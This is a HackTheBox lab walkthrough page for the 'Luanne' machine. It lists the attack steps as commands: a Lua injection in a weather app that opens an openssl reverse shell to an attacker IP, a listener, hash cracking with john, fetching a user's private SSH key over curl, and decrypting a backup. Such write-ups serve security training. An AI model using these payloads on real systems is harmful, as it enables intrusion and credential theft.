xct's notes
xct's notes
Introduction
Red Team
Active Directory
Host Enum
Payloads
Passwords
Privilege Escalation
Evasion & Bypasses
Concepts & Research
Binary Exploitation
Web
Cloud
Mobile
Hardware
Crypto
Templates
Misc
Blue Team
Active Directory
Malware Analysis
SIEM
Misc
Keys & Signing
Language & Framwork Specifics
Misc
HackTheBox
Crossfit
Luanne
APT
Powered by GitBook

Luanne

Accompanying notes for https://youtu.be/TlFmnbEAi1s

Weather app injection

'+..+os.execute("mkfifo+/tmp/s%3b+/bin/sh+-i+<+/tmp/s+2>%261+|+openssl+s_client+-quiet+-connect+10.10.14.70%3a1337+>+/tmp/s%3b+rm+/tmp/s")+..+'

Catch openssl shell:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

Crack hash from .htpasswd

john -w=~/tools/SecLists/Passwords/Leaked-Databases/rockyou.txt hash

Request private key

curl http://webapi_user:[email protected]:3001/~r.michaels/id_rsa

Decrypt

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc
HackTheBox - Previous
Crossfit
Next - HackTheBox
APT
Last updated 2 weeks ago